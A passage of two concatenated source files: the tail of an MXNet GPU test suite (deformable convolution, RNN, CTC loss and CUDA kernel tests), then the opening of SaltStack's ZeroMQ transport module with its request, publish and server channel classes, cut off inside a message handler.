np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_offset': (2, 18, 7, 7),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
name='deformable_conv')
@with_seed()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@unittest.skip("Test fails intermittently. Temporarily disabled until fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/8211")
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@unittest.skip("JIRA issue: https://issues.apache.org/jira/projects/MXNET/issues/MXNET-130")
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_score = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_score = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 20)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
if __name__ == '__main__':
import nose
nose.runmodule()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import logging
import os
import errno
import hashlib
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
if key not in loop_instance_map:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
try:
return loop_instance_map[key]
except KeyError:
# In iterating over the loop_instance_map, we may have triggered
# garbage collection. Therefore, the key is no longer present in
# the map. Re-gen and add to map.
log.debug('Initializing new AsyncZeroMQReqChannel due to GC for {0}'.format(key))
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
return loop_instance_map[key]
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClient(self.opts,
self.master_uri,
io_loop=self._io_loop,
)
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return controle back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
raise tornado.gen.Return(pcrypt.loads(ret[dictkey]))
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
if 'io_loop' in kwargs:
self.io_loop = kwargs['io_loop']
else:
self.io_loop = tornado.ioloop.IOLoop()
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.IDENTITY, self.opts['id'])
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
# TODO: Optionally call stream.close() on newer pyzmq? Its broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for recieved messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
# Socket monitor shall be used the only for debug purposes so using threading doesn't look too bad here
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def close(self):
'''
Cleanly shutdown the router socket
'''
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, 'clients'):
self.clients.close()
self.stream.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underylying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as e:
log.error('Bad load from minion')
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
